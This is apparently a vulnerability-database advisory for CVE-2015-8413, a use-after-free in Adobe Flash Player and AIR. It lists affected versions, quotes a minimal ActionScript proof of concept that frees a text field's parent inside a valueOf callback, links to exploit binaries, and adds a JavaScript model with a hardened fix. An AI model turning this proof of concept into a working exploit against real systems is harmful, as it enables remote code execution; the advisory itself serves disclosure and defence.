Use-After-Free Vulnerability in Multiple Adobe Products

Vulnerability ID: 1123162    Vulnerability type: Other
Published: 2015-12-18    Updated: 2015-12-18
CVE ID: CVE-2015-8413    CNNVD-ID: CNNVD-201512-243
Platform: Windows_x86-64    CVSS score: 10.0
|Vulnerability Source
https://www.exploit-db.com/exploits/39043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-243
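|Vulnerability Details
Adobe Flash Player, Adobe AIR SDK and Adobe AIR SDK & Compiler are all products of Adobe, a US company. Adobe Flash Player is a multimedia player; Adobe AIR SDK and Adobe AIR SDK & Compiler are standard development kits for Adobe AIR (a cross-operating-system runtime environment). A use-after-free vulnerability exists in multiple Adobe products. An attacker can exploit this vulnerability to execute arbitrary code and take control of an affected system. The following products and versions are affected: Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier and Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh; Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and Chrome OS; Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10; Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1; Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux; AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh; AIR SDK 19.0.0.241 and earlier and AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS; AIR for Android 19.0.0.241 and earlier on Android.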
|Vulnerability Exploit (EXP)
Source: https://code.google.com/p/google-security-research/issues/detail?id=590

There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed. A minimal PoC follows:

var mc = this.createEmptyMovieClip("mc", 301);
var myText_txt = mc.createTextField("myText_txt", 302, 1, 1, 100, 100);
myText_txt.text = "this is my text";
Selection.setFocus("myText_txt");
var n = {valueOf : func};
Selection.setSelection(n, 3);

function func(){

  mc.removeMovieClip();
  // Fix heap here
  return 0;

}

A sample swf and fla are attached. Note that this PoC only works on 64-bit platforms.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39043.zip
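
The ordering problem the report describes, modelled in plain JavaScript as an added example (not code from the original report, Adobe, or Flash Player): argument coercion runs a script `valueOf` callback after the native function has already captured the text field. All class and function names are hypothetical, a `freed` flag stands in for real heap release, and the hardened ordering is a common pattern assumed here, not Adobe's actual patch.

```javascript
// Added model of the coercion re-entrancy pattern; every name here is hypothetical.
class Clip {
  constructor() { this.children = []; }
  createTextField(name, text) {
    const tf = { name, text, freed: false, selection: null };
    this.children.push(tf);
    return tf;
  }
  // Models removeMovieClip(): the clip releases everything it owns.
  remove() {
    for (const tf of this.children) tf.freed = true;
    this.children = [];
  }
}
const focus = { target: null }; // models the state set by Selection.setFocus

// Stand-in for dereferencing a native object; a real runtime would corrupt memory.
function touch(tf) {
  if (tf.freed) throw new Error("use-after-free: " + tf.name);
  return tf;
}

// Vulnerable order: capture the field, THEN coerce arguments (runs script valueOf).
function setSelectionVulnerable(begin, end) {
  const tf = focus.target;      // reference captured before coercion
  if (!tf) return false;
  const b = Number(begin);      // script callback may release tf's parent here
  const e = Number(end);
  touch(tf).selection = [b, e]; // stale reference used
  return true;
}

// Hardened order: coerce every argument first, then resolve and validate the target.
function setSelectionHardened(begin, end) {
  const b = Number(begin);
  const e = Number(end);
  const tf = focus.target;
  if (!tf || tf.freed) return false; // target released during coercion: no-op
  tf.selection = [b, e];
  return true;
}

// Constructed scenario with the same shape as the PoC: valueOf removes the parent clip.
function run(setSelection) {
  const mc = new Clip();
  focus.target = mc.createTextField("myText_txt", "this is my text");
  const n = { valueOf() { mc.remove(); return 0; } };
  try { return setSelection(n, 3) ? "selected" : "ignored"; }
  catch (err) { return err.message; }
}
```

`run(setSelectionVulnerable)` reports the stale access, while `run(setSelectionHardened)` treats the call as a no-op because the target is checked only after all script-visible callbacks have finished.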
|References

Source: helpx.adobe.com
Link: https://helpx.adobe.com/security/products/flash-player/apsb15-32.html